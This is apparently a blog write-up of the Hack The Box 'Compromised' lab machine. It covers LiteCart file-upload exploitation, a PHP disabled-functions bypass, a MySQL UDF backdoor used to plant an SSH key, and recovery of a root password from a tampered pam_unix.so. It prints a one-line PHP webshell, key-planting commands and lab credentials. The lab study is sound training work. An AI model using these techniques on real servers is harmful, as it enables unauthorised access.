21st April 2021
Hack The Box Compromised Write-Up by T13nn3s

Hack The Box Write-Up – Compromised –

You may not control all the events that happen to you, but you can decide not to be reduced by them.

Maya Angelou

About Compromised

In this post, I’m writing a write-up for machine Compromised from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Compromised is a ‘Hard’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 20, and submitting the root flag your points will be raised by 40.

The port scan discovers two open ports. The first port is 22/tcp (SSH) and the second port is 80/tcp HTTP. On the enumeration of the web server, we can discover that LiteCart is being used. After a directory brute-force, we have discovered an admin panel and a /backup directory. The contents of the backup directory reveal overwhelming evidence that this machine is already compromised. In the hidden file .log2301c9430d8593ae.txt we can discover the credentials for the LiteCart admin panel. After we’ve found the LiteCart version, we can discover an Arbitrary File Upload (Authenticated) vulnerability and we have our foothold on this machine.

Through the founded vulnerability we’ve tried to gain a webshell and then we can discover that the Blue Team got in involved in this compromise. They have already taken action and disabled some PHP-functions. As the is an older version of PHP in use, we can bypass the disabled functions and upload a specially crafted PHP-file to get Remote Command Execution (RCE) on this machine. Through this RCE we are able to find credentials for the user account which is used by MySQL, and then we can find a backdoor in the User Defined Functions (UDF). Through this backdoor, we can write our public key to the authorized_keys of the user account mysql.

After we have a shell as the user account mysql, we can find the password of the user account sysadmin in the file trace-log.dat. With the use of the founded password, we can latterly move from the user account mysql to the user account sysadmin and we are able to read the user flag.

This part was the hardest part and has taken me some hours to solve. After checking the integrity of the files, we can find the file pam_unix.so. After decompiling this program we can find an authentication function with parts of the password, after converting the HEX-value of the password we have the password of the root user account. This sounds easy right now, but I was totally lost in this part. Because the password was not functioning. After reversing the password it was working and we where able to read the root flag.

Machine Info

Hack The Box Compromised Write-Up by T13nn3s
Hack The Box Compromised Write-Up by T13nn3s
Hack The box Compromised Machine IP and Maker
Hack The Box Compromised Machine IP and Makers


Port scan

As always we start the box with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/

The results.

Starting Nmap 7.90SVN ( https://nmap.org ) at 2020-11-30 19:21 CET
Nmap scan report for
Host is up (0.038s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

There are two open ports. The first discovered port is the default SSH port 22/tcp. The second port is the default HTTP port 80/tcp. The HTTP title is revealing the name of this website: Legitimate Rubber Ducks | Online Store. It seems that I’m dealing with a webshop or something. The requested source is I have added the hostname compromised.htb to my hosts’ file.

Enumerating Web Service

Let’s start with the enumeration of the website. I visited the URL It is immediately noticeable that the e-commerce platform LiteCart is being used. On the contact-section the email address [email protected] is visible.

Hack The Box Compromised LiteCart

On the page, I’m able to register a new account. Of course, I want a new account, so let’s register a new account! After searching some around, I see that I can order some rubber ducks. Interesting! But, I want to find a vulnerability. After a quick search on the internet, I found this recent vulnerability https://nvd.nist.gov/vuln/detail/CVE-2020-9018. I tried to use this vulnerability, but no luck. Maybe I need more information to get this working. As the name of this box is ‘Compromised’, maybe someone has already compromised this machine and had uploaded a webshell.

Let’s brute-forcing the directories. I used my favorite brute-forcer wfuzz for this one.

~$ wfuzz -c -w ../../wordlists/wfuzz/general/common.txt --hc=401,402,403,404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.4.6 - The Web Fuzzer                         *

Total requests: 949

ID           Response   Lines    Word     Chars       Payload                                                                                                                 

000000088:   301        9 L      28 W     313 Ch      "backup"                                                                                                                
000000749:   301        9 L      28 W     311 Ch      "shop"                                                                                                                  

Total time: 4.565328
Processed Requests: 949
Filtered Requests: 947
Requests/sec.: 207.8711

It’s discovering the directory This directory contains an archive, named a.tar.gz. Let’s downloading and analyzing this file.

Hack The Box Compromised tar file

After downloading I extracted this archive.

~$ tar -xvf a.tar.gz

After extracting this archive, I got the directory with the name shop. It seems that this file is containing a copy of the website. From the index.php, I got the version of LiteCart, version 2.1.2. The vulnerability I found Is applicable from version 2.2.1, maybe that’s the reason why this vulnerability is not working. After checking the internet, there is a vulnerability for this version of LiteCart, an Arbitrary File Upload (Authenticated). But to use this vulnerability, I need access to the admin portal.

~$ cat index.php                                                                                                                                                
 * LiteCart® 2.1.2                                                                                                                                                                      
 * Online Catalog and Shopping Cart Platform                                                                                                                                             

In the errors.log file, I’ve found the admin portal. The interesting part here is that there is a client visible, with the name kali-pentest.fios-router.home. My assumption, that this machine is already compromised seems to be becoming truth.

~$ cat errors.log
[28-May-2020 01:48:07 America/New_York] Notice: Undefined index: password in ~/admin/login.php on line 28
Request: GET /shop/admin/login.php HTTP/1.1
Client: (kali-pentest.fios-router.home)
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

First, let’s check if the admin portal is really there, I checked the URL, and this page is existing.

Hack The Box Compromised admin portal

In the root of this directory, there is a PHP-file, with the name .sh.php. So, this file is hidden. Why is this file is hidden? Let’s check the contents… Hm, a webshell. This machine is already compromised! It uses the system() function to execute commands that are being passed through cmd HTTP-request REQUEST parameter.

~$ cat .sh.php 
<?php system($_REQUEST['cmd']); ?>

This file is there, and it seems I can access it, but cannot get any command working. So, I think this is a rabbit hole. After checking the file ‘/shop/admin/index.php’, I see that the credentials get dropped in a file, named .log2301c9430d8593ae.txt. It’s a hidden file.

if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);

  if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';

  $page_login = new view();
  $page_login->snippets = array(
    'action' => $redirect_url,
  echo $page_login->stitch('pages/login');

  require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');


Admin access LiteCart

Maybe, I can access this file through a GET request. Let’s spin up Burp. This file is located in the /admin directory. So, I configured my HTTP GET request as

Hack The Box Compromised admin credentials
HTTP GET request

Yes! Got credentials.


Now, I have the admin credentials of the web portal, I can try to use the known vulnerability.


Arbitrary File Upload (Authenticated)

The next step is to use the vulnerability to get a webshell or reverse shell on this machine. I downloaded my favorite webshell to my machine. I want to upload this webshell to the box. So, the first step is to log in as the admin user account.

Hack The Box Compromised admin access

Let’s go to the vulnerable page and upload the webshell.

Hack The Box Compromised LiteCart vulnerability

I tried to upload but received the message: You must provide a valid vQmod file. So, there is a file extension restriction in place. Ok, so I need to bypass it. Let’s do it again and capture the upload with Burp.

Hack The Box Compromised upload webshell
upload webshell

I’ve captured the upload with Burp and changed the content-type from text/php into application/xml. The upload was successful! Well, the upload was successful, but nothing is working. After trying some other web shells, I came to the conclusion that there is something wrong with the PHP on this server. I created a simple PHP script to check the phpinfo() on this machine and uploaded this PHP-file to the box.

Contents of the file:


I uploaded this file and I found that most of the PHP functions are disabled. Also, this page is revealing the PHP version. This website is using PHP Version 7.2.24. This is an older version of PHP, I need to find a way to bypass the disabled PHP functions.

Hack The Box Compromised disabled PHP functions

After searching on the internet, I used this script to bypass the disabled PHP functions. https://raw.githubusercontent.com/mm0r1/exploits/master/php7-gc-bypass/exploit.php. I changed the command to the command below, to get some information out of this machine.

pwn("id; pwd; ls");

Cool! This script is working.

Hack The Box Compromised bypass disabled PHP functions

In the second upload, I’ve requested the content of the /etc/passwd file. Because I want to know which users got bash permission to this machine. And, the user account mysql got the permission. Why should a mysql user account has permissions to use a bash shell?! For me, there has to be a reason. It means that there is a MySQL database on this machine. I need to find a way to get into this database to read the contents.

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash

Again, this box is named compromised and the MySQL user account has access to use bash. Through this exploit, I can do some more enumeration on this machine. To make my work easier, I have changed my payload to pwn($_REQUEST['cmd']); so, that I can do command execution.

After some time of searching, I found the credentials for the MySQL database, with this command: The password was not directly visible, but when I’ve looked at the source code of this file, lot more information can be discovered.

Hack The Box Compromised MySQL credentials => source code

I have got now the credentials:


Backdoor in MySQL

I know that this machine is a compromised machine and that the blue guys intervened to prevent further damage. After spending some time on the Internet, to find information on how a backdoor can be placed in a compromised MySQL-database. I came across this article about a MySQL backdoor: https://pure.security/simple-mysql-backdoor-using-user-defined-functions/.

Let’s find out if there are User Defined Functions (UDF). I used this command below.

mysql -u root -p changethis -e "SELECT * FROM mysql.func;"

After accessing the file, I can see that there is a backdoor installed in the User Defined Functions (UDF) of this machine.

Hack The Box Compromised MySQL UDF -u root -pchangethis -e “SELECT * FROM mysql.func;”

Ok, now things become more interesting. There is a User Defined Function available with the name exec_cmd. The Blue Team are overlooked this UDF? However, we can use this mistake to our advantage.

Hack The Box Compromised Backdoor in MySQL mysql -u root -pchangethis -e “SELECT exec_cmd(‘whoami’);”

We can now execute commands on the behalf of the user account mysql. As this account has the permissions for a shell, we can add my private key to this user’s account so that we can create an SSH shell for this machine.

Shell as mysql

Let’s generate a new key-pair with ssh-keygen. We can use any key type. For this scenario, we are using ed25519. This key type has a relatively short key length, making it more comfortable to work with.

 ~$ ssh-keygen -t ed25519 -f id_ed25519
 Generating public/private ed25519 key pair.
 Enter passphrase (empty for no passphrase): 
 Enter same passphrase again: 
 Your identification has been saved in id_ed25519.
 Your public key has been saved in id_ed25519.pub.
 The key fingerprint is:
 SHA256:2pJWEBas9frVUz4KBZ/Lt/ajrQaS75clCvFGjjkmd08 [email protected]
 The key's randomart image is:
 +--[ED25519 256]--+
 |     .+.         |
 |     .o.  .      |
 |     o..   o .   |
 |    .  ... .+ .  |
 |       .S O+ +   |
 |      .* Xo*=E+. |
 |      =.=.B.=++o |
 |     . ..  o.=+. |
 |          ..o+ooo|

With this command echo [SSH Public key] > ~/.ssh/authorized_keys, we can add our public key to the authorized_keys of the user account mysql. -u root -pchangethis -e "SELECT exec_cmd(mkdir -p; echo \"ssh-ed25519%20AAAAC3NzaC1lZDI1NTE5AAAAIICUfLMEPJ9McZP71VMmcXGUiFGqol4rskwJhtTGhPme [email protected]\" > /var/lib/mysql/.ssh/authorized_keys');"

The public key is added, we can now create a SSH session as the user mysql.

 ~$ ssh [email protected] -i ./id_25519
 Last login: Thu Sep  3 11:52:44 2020 from
 [email protected]:~$ 

Lateral Movement

Move from mysql to sysadmin

Found some files in the home directory, and after some searching, I found the password of the user account sysadmin in the file trace-log.dat.

 [email protected]:~$ cat strace-log.dat | grep password
 22102 03:11:06 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
 22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
 22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
 22102 03:11:10 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
 22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changeme"], 0x55bc62467900 /* 21 vars */) = 0
 22228 03:11:15 write(2, "[Warning] Using a password on th"..., 73) = 73
 22102 03:11:16 write(2, "mysql -u root --password='change"..., 35) = 35
 22229 03:11:18 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changethis"], 0x55bc62467900 /* 21 vars */) = 0
 22229 03:11:18 write(2, "[Warning] Using a password on th"..., 73) = 73
 22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
 22232 03:11:52 read(5, "#\n# /etc/pam.d/common-password -"..., 4096) = 1440
 22232 03:11:52 write(4, "[sudo] password for sysadmin: ", 30) = 30
 [email protected]:~$  

Privilege Escalation


For some reason, we are able to download linpeas.sh from my machine to the sysadmin profile nor the /tmp directory. We need to find a different way to gain root privileges. As we already know, this box is already compromised. I have already done some checks. Checking for specific running processes with ps aux and checked the files in /var/www/html directory. After searhcing around, I talked with a buddy and he advised me to check the integrity of the files. After some searching I found this command: dpkg -V. got this left:

 Compromised:/$ dpkg -V
 dpkg: warning: linux-modules-4.15.0-99-generic: unable to open /boot/System.map-4.15.0-99-generic for hash: Permission denied
 ??5??????   /boot/System.map-4.15.0-99-generic
 ??5?????? c /etc/apache2/apache2.conf
 ??5?????? c /etc/apache2/sites-available/000-default.conf
 dpkg: warning: linux-image-4.15.0-101-generic: unable to open /boot/vmlinuz-4.15.0-101-generic for hash: Permission denied
 ??5??????   /boot/vmlinuz-4.15.0-101-generic
 dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
 ??5?????? c /etc/sudoers
 dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
 ??5?????? c /etc/sudoers.d/README
 dpkg: warning: at: unable to open /etc/at.deny for hash: Permission denied
 ??5?????? c /etc/at.deny
 dpkg: warning: open-iscsi: unable to open /etc/iscsi/iscsid.conf for hash: Permission denied
 ??5?????? c /etc/iscsi/iscsid.conf
 dpkg: warning: linux-image-4.15.0-99-generic: unable to open /boot/vmlinuz-4.15.0-99-generic for hash: Permission denied
 ??5??????   /boot/vmlinuz-4.15.0-99-generic
 ??5??????   /bin/nc.openbsd
 dpkg: warning: linux-modules-4.15.0-101-generic: unable to open /boot/System.map-4.15.0-101-generic for hash: Permission denied
 ??5??????   /boot/System.map-4.15.0-101-generic
 dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
 ??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
 ??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
 ??5?????? c /etc/apparmor.d/usr.sbin.mysqld
 ??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
 [1]+  Done                    dpkg -V
 [email protected]:/$  

After some reading and trying, we got left with this file /lib/x86_64-linux-gnu/security/pam_unix.so. According to the file extension, it’s a Shared Library Function, I’m not sure what it means but the contents can be dumped with objdump. After a long time of reading and analyzing, I came across an authentication function.

 [email protected]:/lib$ objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less
 p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 14.0px Monaco; color: #f2f2f2; background-color: #000000; background-color: rgba(0, 0, 0, 0.85)} span.s1 {font-variant-ligatures: no-common-ligatures} 
  3156:       48 89 ef                mov    %rbp,%rdi
     3159:       e8 e2 24 00 00          callq  5640 <_unix_blankpasswd>
     315e:       85 c0                   test   %eax,%eax
     3160:       0f 84 1a ff ff ff       je     3080 <pam_sm_authenticate+0x110>
     3166:       45 85 f6                test   %r14d,%r14d
     3169:       48 c7 44 24 08 00 00    movq   $0x0,0x8(%rsp)
     3170:       00 00 
     3172:       0f 84 d4 fe ff ff       je     304c <pam_sm_authenticate+0xdc>
     3178:       4d 85 ed                test   %r13,%r13
     317b:       0f 84 d8 fe ff ff       je     3059 <pam_sm_authenticate+0xe9>
     3181:       41 c7 45 00 00 00 00    movl   $0x0,0x0(%r13)
     3188:       00 
     3189:       e9 89 fe ff ff          jmpq   3017 <pam_sm_authenticate+0xa7>
     318e:       66 90                   xchg   %ax,%ax
     3190:       4c 8b 7c 24 10          mov    0x10(%rsp),%r15
     3195:       48 b8 7a 6c 6b 65 7e    movabs $0x4533557e656b6c7a,%rax
     319c:       55 33 45 
     319f:       48 8d 74 24 19          lea    0x19(%rsp),%rsi
     31a4:       48 89 44 24 19          mov    %rax,0x19(%rsp)
     31a9:       48 b8 6e 76 38 32 6d    movabs $0x2d326d3238766e,%rax
     31b0:       32 2d 00 
     31b3:       48 89 44 24 21          mov    %rax,0x21 

I decided to give every HEX around this function to CyberChef. This part has taken me a very long time, but eventually I managed to find the password by giving this HEX value to CyberChef: 2d326d3238766e4533557e656b6c7a. The result was the password in reverse: -2m28vnE3U~eklz. After reversing this password with CyberChef, we have this password: zlke~U3Env82m2-.

Why the need for reversing the password? This part was new for me

Now switching to the user root and take the root flag.

 [email protected]:/lib$ su - root
 [email protected]:~# cat root.txt
 [email protected]:~# 

Thanks for reading this write-up! I really enjoyed this machine. I hope you have enjoyed reading my write-up. If so, please consider spending a respect point. My Hack The Box Profile: https://app.hackthebox.eu/profile/224856.

Happy Hacker face!


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *